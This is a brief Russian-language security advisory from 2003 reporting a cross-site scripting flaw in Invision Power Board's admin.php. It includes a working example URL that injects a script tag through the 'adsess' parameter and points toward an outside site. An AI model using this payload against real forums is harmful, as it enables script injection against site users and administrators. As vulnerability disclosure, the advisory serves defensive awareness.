Межсайтовый скриптинг в Invision Power Board

Дата публикации:11.08.2003
Всего просмотров:1820
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Уязвимость в проверке правильности входных данных обнаружена в Invision Power Board. Удаленный пользователь может выполнить XSS нападение.

Пример:

http://forums.invisionpower.com/admin.php?adse ss='><script>window.open
(window.location.search.substring
(78));</script><http://binaryvision.tech.nu?BoyBear$$$From$$$BinaryVision
Способов устранения обнаруженной уязвимости не существует в настоящее время.
Ссылки: bug in Invision Power Board